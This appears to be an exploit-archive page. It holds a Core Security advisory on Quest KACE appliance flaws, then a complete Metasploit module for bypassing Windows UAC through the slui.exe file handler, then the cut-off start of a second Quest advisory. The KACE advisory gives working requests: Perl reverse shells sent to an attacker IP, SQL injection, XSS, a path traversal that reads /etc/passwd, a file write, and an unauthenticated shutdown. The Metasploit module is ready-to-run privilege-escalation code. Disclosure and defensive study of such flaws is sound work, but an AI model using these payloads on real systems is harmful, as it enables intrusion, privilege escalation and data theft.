Quest KACE System Management Appliance 8.0 (Build 8.0.318) XSS / Traversal / Code Execution / SQL Injection

Core Security – Corelabs Advisory
http://corelabs.coresecurity.com/

Quest KACE System Management Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest KACE System Management Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0004
Advisory URL:
http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege
Management [CWE-269], Improper Privilege Management [CWE-269], Improper
Authorization [CWE-285], Improper Neutralization of Special Elements used
in an SQL Command [CWE-89], Improper Neutralization of Special Elements
used in an SQL Command [CWE-89], Improper Neutralization of Input During
Web Page Generation [CWE-79], External Control of File Name or Path
[CWE-73], External Control of File Name or Path [CWE-73]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,
CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,
CVE-2018-11133,
CVE-2018-11137, CVE-2018-11141

3. *Vulnerability Description*

>From Quest KACE’s website:

“The KACE Systems Management Appliance [1] provides
your growing organization with comprehensive management of network-connected
devices, including servers, PCs, Macs, Chromebooks, tablets, printers,
storage, networking gear and the Internet of Things (IoT). KACE can fulfill
all of your organization’s systems management needs, from initial deployment
to ongoing management and retirement.”

Multiple vulnerabilities were found in the Quest KACE System Management
Virtual Appliance that would allow a remote attacker to gain command
execution as root. We present three vectors to achieve this, including
one that can be exploited as an unauthenticated user.

Additional web application vulnerabilities were found in the web console
that is bundled with the product. These vulnerabilities are detailed in
section 7.

Note: This advisory has limited details on the vulnerabilities because
during the attempted coordinated disclosure process, Quest advised us not
to distribute our original findings to the public or else they would
take legal action. Quest’s definition of “responsible disclosure” can be
found at
https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes
in coordinated disclosure and good faith collaboration with software vendors
before disclosure to help ensure that a fix or workaround solution is ready
and available when the vulnerability details are publicized. We believe
that providing technical details about each finding is necessary to provide
users and organizations with enough information to understand the
implications
of the vulnerabilities against their environment and, most importantly, to
prioritize the remediation activities aiming at mitigating risk.

We regret Quest’s posture on disclosure during the whole process (detailed
in the Report Timeline section) and the lack of a possibility of engaging
into a coordinated publication date, something we achieve (and have
achieved) with many vendors as part of our coordinated disclosure practices.

4. *Vulnerable Packages*

. Quest KACE System Management Appliance 8.0 (Build 8.0.318)
Other products and versions might be affected too, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest reports that it has released the security vulnerability patch
SEC2018_20180410 to address the reported vulnerabilities.
Patch can be download at
https://support.quest.com/download-install-detail/6086148.

For more details, Quest published the following Security Note:
https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
and Guido Leo from Core Security Consulting Services. The publication of
this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Quest KACE SMA ships with a web console that provides administrators and
users with several features. Multiple vulnerabilities were found in the
context of this console, both from an authenticated and unauthenticated
perspective.

Section 7.1 describes how an unauthenticated attacker could gain command
execution on the system as the web server user.

Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code
execution but would require the attacker to have a valid authentication
token.

In addition, issues found in the Sudo Server module presented in 7.4 and
7.5 would allow the attacker to elevate his privileges from the web server
user to root, effectively obtaining full control of the device.

Additional web application vulnerabilities were found in the console, such
as insufficient authorization for critical functions, which would allow an
anonymous attacker to reconfigure the appliance (7.6), SQL injection
vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path
traversal vulnerabilities, which would allow an attacker to read, write and
delete arbitrary files (7.9, 7.10, 7.11).

7.1. *Unauthenticated command injection*

[CVE-2018-11138]
The ‘/common/download_agent_installer.php’ script is accessible to anonymous
users in order to download an agent for a specific platform. This behavior
can be abused to execute arbitrary commands on the system.

The script receives the following parameters via the GET method:

. platform: Indicates the platform in which the agent is going to be
installed
. serv: SHA256 hash of a fixed value that depends of each appliance
. orgid: Organization ID
. version: Version number of the agent

The last two conditions are simple to meet. The Agent versions are publicly
available within the Quest KACE site, but even if they were not, we found
that the Organization ID parameter is vulnerable to a time based SQL
injection
(refer to issue 7.7).
This would make it possible to obtain the agent version by querying the
table ‘CLIENT_DISTRIBUTION’ and fetching the contents of the ‘VERSION’
column. The Organization ID is 1 by default, but could be obtained in the
same way as the Agent version by querying the table ‘ORGANIZATION’ and
the column ‘ID’.

As stated above, the application uses the Organization ID and Agent
version parameters to execute commands. This means we need to find a way
to append system commands within the Organization ID, without breaking the
SQL query. If we use the comment symbol (#), we can append anything we want
without affecting the result of the query.

Preparing payload:

/—–
– platform = windows
– serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c
– orgid = 1#;perl -e ‘use
Socket;$i=”[AttackerIP]”;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash
-i”);};’;
– version = 8.0.152 (last agent version available for windows)
—–/

The following proof of concept executes a reverse shell:

/—–
GET
/common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+’use+Socket%3b$i%3d”[AttackerIP]”%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>%26S”)%3bopen(STDOUT,”>%26S”)%3bopen(STDERR,”>%26S”)%3bexec(“/bin/sh+-i”)%3b}%3b’%3b&version=8.0.152
HTTP/1.1
Host: Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
—–/

/—–
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,
sport 20050)
sh: can’t access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
—–/

7.2. *Authenticated command injection*

[CVE-2018-11139]
The ‘/common/ajax_email_connection_test.php’ script used to test the
configured
SMTP server is accessible by any authenticated user and can be abused to
execute arbitrary commands on the system. This script is vulnerable to
command injection via the unsanitized user input ‘TEST_SERVER’ sent to the
script via POST method.

The following proof of concept executes a reverse shell:

/—–
POST /common/ajax_email_connection_test.php HTTP/1.1
Host: [ServerIP]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 416
Cookie: [Cookie]
Connection: close

TEST_SERVER=test;perl+-e+’use+Socket%3b$i%3d”[AttackerIP]”%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>%26S”)%3bopen(STDOUT,”>%26S”)%3bopen(STDERR,”>%26S”)%3bexec(“/bin/sh+-i”)%3b}%3b’;&TEST_PORT=587&[email protected]&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&[email protected]&ACTION=TEST_CONNECTION_SMTP
—–/

/—–
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,
sport 20050)
sh: can’t access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
—–/

7.3. *PHP Object Injection leading to arbitrary command execution*

[CVE-2018-11135]
An authenticated user could abuse a deserialization call on the script
‘/adminui/error_details.php’ to inject arbitrary PHP objects.

To exploit this issue, the parameter ‘ERROR_MESSAGES’ needs to be an array
and meet some specific conditions in order to successfully exploit the
issue.

7.4. *Privilege escalation via password change in Sudo Server*

[CVE-2018-11134]
In order to perform actions that requires higher privileges, the application
relies on a message queue managed that runs with root privileges and only
allows a set of commands.

One of the available commands allows to change any user’s password
(including root).

Assuming we are able to run commands in the server, we could abuse this
feature by changing the password of the ‘kace_support’ account, which
comes disabled by default but has full sudo privileges.

7.5. *Privilege escalation via command injection in Sudo Server*

[CVE-2018-11132]
As mentioned in the issue [7.4], in order to perform actions that require
higher privileges, the application relies on a message queue that runs
daemonized with root privileges and only allows a set of commands to be
executed.

A command injection vulnerability exists within this message queue which
allows us to append arbitrary commands that will be run as root.

7.6. *Insufficient Authorization for critical function*

[CVE-2018-11142]
‘systemui/settings_network.php’ and ‘systemui/settings_patching.php’
scripts are accessible only from localhost. This restriction can be bypassed
by modifying the ‘Host’ and ‘X_Forwarded_For’ HTTP headers.

The following proof of concept abuses this vulnerability to shutdown the
server as an anonymous user:

/—–
POST /systemui/settings_network.php HTTP/1.1
Host: localhost
X-Forwarded-For: ::1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIp]/systemui/settings_network.php
Content-Type: multipart/form-data;
boundary=—————————5642543667001619951434940129
Content-Length: 3418
Connection: close
Upgrade-Insecure-Requests: 1

—————————–5642543667001619951434940129
Content-Disposition: form-data; name=”CSRF_TOKEN”
—————————–5642543667001619951434940129
Content-Disposition: form-data; name=”$shutdown”
DoIt!
Content-Disposition: form-data; name=”save”
Save
—————————–5642543667001619951434940129–
—–/

7.7. *Unauthenticated SQL Injection in download_agent_installer.php*

[CVE-2018-11136]
The ‘orgID’ parameter received by the ‘/common/download_agent_installer.php’
script is not sanitized, leading to SQL injection. In particular, a blind
time based type.

The following proof of concept induces a time delay:

/—–
http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1
AND SLEEP(10)%23;&version=8.0.152
—–/

7.8. *SQL Injection in run_report.php*

[CVE-2018-11140]
The ‘reportID’ parameter received by the ‘/common/run_report.php’ script
is not sanitized, leading to SQL injection. In particular, an error based
type.

The following proof of concept retrieves the current database name:

/—–
POST /common/run_report.php HTTP/1.1
Content-Length: 161
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: [ServerIP]
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]

date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL–+LhEx&reportName=&format=pdf
—–/

/—–
HTTP/1.1 200 OK
Date: Thu, 08 Feb 2018 21:50:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,
x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: [ServerIP]
X-KACE-Version: 8.0.318
X-KBOX-WebServer: [ServerIP]
X-KBOX-Version: 8.0.318
X-KACE-WebServer: [ServerIP]
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Content-Length: 3548
Connection: close
Content-Type: text/html; charset=utf-8

[…SNIPPED…]
<script type=”text/javascript”
src=”/common/js/vendor/html5.js?BUILD=318″ /></script>
<![endif]–><title>Report Queued: qppjqORG1qjpqq</title><meta
http-equiv=’refresh’
[…SNIPPED…]
—–/

7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*

[CVE-2018-11133]
The ‘fmt’ parameter of the ‘/common/run_cross_report.php’ script is
vulnerable to cross-site scripting.

The following proof of concept demonstrates the vulnerability:

/—–
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403′)%3balert(1)%2f%2f952
—–/

7.10. *Path traversal in download_attachment.php leading to arbitrary
file read*

[CVE-2018-11137]
The ‘checksum’ parameter of the ‘/common/download_attachment.php’ script can
be abused to read arbitrary files with ‘www’ privileges. The following proof
of concept reads the ‘/etc/passwd’ file. No administrator privileges are
needed to execute this script.

It is worth noting that there are several interesting files that can be
read with ‘www’ privileges, such as all the files located in
‘/kbox/bin/koneas/keys/’ and ‘/kbox/kboxwww/include/globals.inc’,
which contain plaintext passwords.

/—–
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403′)%3balert(1)%2f%2f952
—–/

The following proof of concept demonstrates the vulnerability:

/—–
GET
/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename=
HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Thu, 18 Jan 2018 17:18:19 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Expires: -1
Pragma: public
Content-Disposition: attachment; filename=””
Content-Transfer-Encoding: Binary
Content-Description: K1000 attachment
Content-Length: 2400
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,
x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: k10000.
X-KACE-Version: 8.0.318
X-KBOX-WebServer: k10000.
X-KBOX-Version: 8.0.318
X-KACE-WebServer: k10000.
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Connection: close
Content-Type: application/octet-stream

# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[…SNIPPED…]
—–/

7.11. *Path traversal in advisory.php leading to arbitrary file
creation/deletion*

[CVE-2018-11141]
The ‘IMAGES_JSON’ and ‘attachments_to_remove[]’ parameters of the
‘/adminui/advisory.php’ script can be abused to write and delete files
respectively. The following proof of concept creates a file located at
‘/kbox/kboxwww/resources/TestWrite’ with the content ‘Sarasa’ (base64
encoded).
Files can be at any location where the ‘www’ user has write permissions.

File deletion could be abused to delete
‘/kbox/kboxwww/systemui/reports/setup_completed.log’ file. This file’s
existence defines if the appliance setup wizard is shown or not.

The following proof of concept demonstrates the vulnerability:

/—–
POST /adminui/advisory.php?ID=10 HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIP]/adminui/advisory.php?ID=10
Content-Type: multipart/form-data;
boundary=—————————2671551246366368501556269100
Content-Length: 1705
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1

—————————–2671551246366368501556269100
Content-Disposition: form-data; name=”CSRF_TOKEN”

99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e
—————————–2671551246366368501556269100
Content-Disposition: form-data; name=”IMAGES_JSON”

{“/../../../resources/TestWrite”:”aaaaaa,VGVzdENvbnRlbnQ=”}
—————————–2671551246366368501556269100
Content-Disposition: form-data; name=”FARRAY[ID]”
[…SNIPPED…]
—–/

Taking advantage of 7.2 and 7.4 we are able to verify the file creation:

/—–
[[email protected] /kbox/kboxwww/resources]# ls -lha
total 32
drwxr-xr-x 2 www wheel 512B Feb 9 20:40 .
drwxr-xr-x 23 root wheel 512B Nov 14 18:29 ..
-rw-r–r– 1 www wheel 11B Feb 9 20:40 TestWrite
—–/

8. *Report Timeline*
2018-02-26: Core Security (Core) sent an initial notification to Quest
Software Inc. (Quest) via web form.
2018-03-05: Quest Support confirmed the receipt and requested additional
information.
2018-03-12: Core Security sent a draft advisory including a technical
description.
2018-03-16: Quest Support asked for the CVE-IDs.
2018-03-16: Core Security answered saying that the CVE-IDs are required
once the vendor verifies the vulnerabilities. Additionally, Core Security
requested a confirmation about the reported vulnerabilities and a tentative
timescale to fix them. Finally, Core Security requested that Quest use
Core’s advisories-publication email address as the official communication
hannel also copying the researchers behind this discovery.
2018-03-16: Quest Support thanked Core’s reply and stated it will be in
touch during the process.
2018-03-20: Quest Support informed that they had not yet received any
updates from the engineering team and had requested one.
2018-03-21: Quest Support requested information about the KACE version
used for reporting the issues and also Core’s company name and information.
2018-03-21: Core replied with the affected version (that was included in
the original draft advisory) and a link to the Core company website and
the list of previous security advisories.
2018-03-21: Quest Support acknowledged the information provided.
2018-03-26: Quest’s KACE product manager (PM) thanked Core for making it
aware of the security issues found and the level of thoroughness and details
provided. Quest specified it had fixes already in place for some of the
issues. Quest’s KACE PM asked for a conference call in order to understand
more about Core’s offerings for future engagements. Finally, Quest’s KACE
PM notified the work done by Core is in breach of its license agreement,
and requested Core not to distribute the findings to the public, otherwise
uest would take legal action.
2018-04-13: Quest’s KACE PM sent a follow up email and informed that it
made a hotfix to patch the reported vulnerabilities. Quest also requested
a call meeting to understand future opportunities based on the Core’s
company capabilities. Finally, Quest asked for information about the
researcher that found the vulnerabilities and a link of Core’s choosing
in order to be included in Quest’s Acknowledgment page
(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements).
2018-04-16: Core answered email from 2018-03-26 stating the company is
following standard practices with regards to coordinated vulnerability
disclosure, and also sent detailed technical information about our findings
at Quest’s request. Core also mentioned Quest seems to be well versed in
the disclosure process and expects vendors to coordinate with it prior to
publication via Quest’s vulnerability reporting process, and that Quest’s
legal threat appears to be in direct contradiction to the disclosure
process that they encourage on their website. Finally, Core asked about
Quest’s intention to work collaboratively to address these vulnerabilities
and to follow industry standard disclosure processes that involves
publication of the vulnerabilities.
2018-04-17: Quest’s KACE PM replied saying it is willing to collaborate
and is looking forward to having a conversation over the phone in order to
continue the next steps in its vulnerability process (forwarded email from
2018-04-13).
2018-04-17: Core thanked the answer and stated the willingness of keeping
written communications between parties in order to better document the
process and communicated the next steps of the process including: 1. Testing
the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor’s link to be
included in the advisory and finally 4. Send final advisory version to
vendor and coordinate publication date together. With regards to Quest’s
requests, Core provided the researchers names and URL of the advisory when
it will be published. Finally, Core stated that the request for other Core
company services could be forwarded to the Core services team if needed
(and asked the right contact at Quest) but our intention is to keep that
services request separate from the coordinated disclosure process.
2018-04-18: Quest Support informed that they had publicly made available
patches for its customers and unilaterally closed the case.
2018-05-31: Advisory CORE-2018-0004 published.

9. *References*

[1] https://www.quest.com/products/kace-systems-management-appliance/

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber-attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The company’s
threat-aware, identity amp; access, network security, and vulnerability
management solutions provide actionable insight and context needed to
manage security risks across the enterprise. This shared insight gives
customers a comprehensive view of their security posture to make better
security remediation decisions. Better insight allows organizations to
prioritize their efforts to protect critical assets, take action sooner
to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or [email protected]

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and (c)
2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Windows UAC Protection Bypass (Via Slui File Handler Hijack)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require ‘msf/core/exploit/exe’
require ‘msf/core/exploit/powershell’

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas

SLUI_DEL_KEY = “HKCU\\Software\\Classes\\exefile”.freeze
SLUI_WRITE_KEY = “HKCU\\Software\\Classes\\exefile\\shell\\open\\command”.freeze
EXEC_REG_DELEGATE_VAL = ‘DelegateExecute’.freeze
EXEC_REG_VAL = ”.freeze # This maps to “(Default)”
EXEC_REG_VAL_TYPE = ‘REG_SZ’.freeze
SLUI_PATH = “%WINDIR%\\System32\\slui.exe”.freeze
CMD_MAX_LEN = 16383

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Windows UAC Protection Bypass (Via Slui File Handler Hijack)’,
‘Description’ => %q{
This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
the Current User hive, and inserting a custom command that will get invoked when any binary
(.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable
to file handler hijacking. When we run slui.exe with changed Registry key
(HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
instead of slui.exe.

The module modifies the registry in order for this exploit to work. The modification is
reverted once the exploitation attempt has finished.

The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting the
payload in a different process.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘bytecode-77’, # UAC bypass discovery and research
‘gushmazuko’, # MSF & PowerShell module
],
‘Platform’ => [‘win’],
‘SessionTypes’ => [‘meterpreter’],
‘Targets’ => [
[‘Windows x86’, { ‘Arch’ => ARCH_X86 }],
[‘Windows x64’, { ‘Arch’ => ARCH_X64 }]
],
‘DefaultTarget’ => 0,
‘References’ => [
[
‘URL’, ‘https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation’,
‘URL’, ‘https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1’
]
],
‘DisclosureDate’ => ‘Jan 15 2018’
)
)
end

def check
if sysinfo[‘OS’] =~ /Windows (8|10)/ && is_uac_enabled?
CheckCode::Appears
else
CheckCode::Safe
end
end

def exploit
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!

commspec = ‘powershell’
registry_view = REGISTRY_VIEW_NATIVE
psh_path = “%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe”

# Make sure we have a sane payload configuration
if sysinfo[‘Architecture’] == ARCH_X64
if session.arch == ARCH_X86
# On x64, check arch
commspec = ‘%WINDIR%\\Sysnative\\cmd.exe /c powershell’
if target_arch.first == ARCH_X64
# We can’t use absolute path here as
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
psh_path = “powershell.exe”
end
end
if target_arch.first == ARCH_X86
# Invoking x86, so switch to SysWOW64
psh_path = “%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe”
end
else
# if we’re on x86, we can’t handle x64 payloads
if target_arch.first == ARCH_X64
fail_with(Failure::BadConfig, ‘x64 Target Selected for x86 System’)
end
end

if !payload.arch.empty? && (payload.arch.first != target_arch.first)
fail_with(Failure::BadConfig, ‘payload and target should use the same architecture’)
end

case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
“UAC is set to ‘Always Notify’. This module does not bypass this setting, exiting…”)
when UAC_DEFAULT
print_good(‘UAC is set to Default’)
print_good(‘BypassUAC can bypass this setting, continuing…’)
when UAC_NO_PROMPT
print_warning(‘UAC set to DoNotPrompt – using ShellExecute “runas” method instead’)
shell_execute_exe
return
end

payload_value = rand_text_alpha(8)
psh_path = expand_path(psh_path)

template_path = Rex::Powershell::Templates::TEMPLATE_DIR
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)

if psh_payload.length > CMD_MAX_LEN
fail_with(Failure::None, “Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})”)
end

psh_stager = “\”IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub(‘HKCU’, ‘HKCU:’)} -Name #{payload_value}).#{payload_value}\””
cmd = “#{psh_path} -nop -w hidden -c #{psh_stager}”

existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || “”
exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

if existing.empty?
registry_createkey(SLUI_WRITE_KEY, registry_view)
end

print_status(“Configuring payload and stager registry keys …”)
unless exist_delegate
registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, ”, EXEC_REG_VAL_TYPE, registry_view)
end

registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

# Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
cmd_path = expand_path(commspec)
cmd_args = expand_path(“Start-Process #{SLUI_PATH} -Verb runas”)
print_status(“Executing payload: #{cmd_path} #{cmd_args}”)

# We can’t use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, ‘Hidden’ => true)

# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
sleep(3)

handler(client)

print_status(“Cleaining …”)
unless exist_delegate
registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
end
if existing.empty?
registry_deletekey(SLUI_DEL_KEY, registry_view)
else
registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
end
registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view)
end

def check_permissions!
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, “Target is not vulnerable.”)
end
fail_with(Failure::None, ‘Already in elevated state’) if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
print_status(‘UAC is Enabled, checking level…’)
vprint_status(‘Checking admin status…’)
admin_group = is_in_admin_group?
if admin_group.nil?
print_error(‘Either whoami is not there or failed to execute’)
print_error(‘Continuing under assumption you already checked…’)
else
if admin_group
print_good(‘Part of Administrators group! Continuing…’)
else
fail_with(Failure::NoAccess, ‘Not in admins group, cannot escalate with this module’)
end
end

if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, ‘Cannot BypassUAC from Low Integrity Level’)
end
end
end

Quest DR Series Disk Backup Software 4.0.3 Code Execution

Core Security – Corelabs Advisory
http://corelabs.coresecurity.com/

Quest DR Series Disk Backup Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest DR Series Disk Backup Multiple Vulnerabilities
Advisory ID: CORE-2018-0002
Advisory URL:
http://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
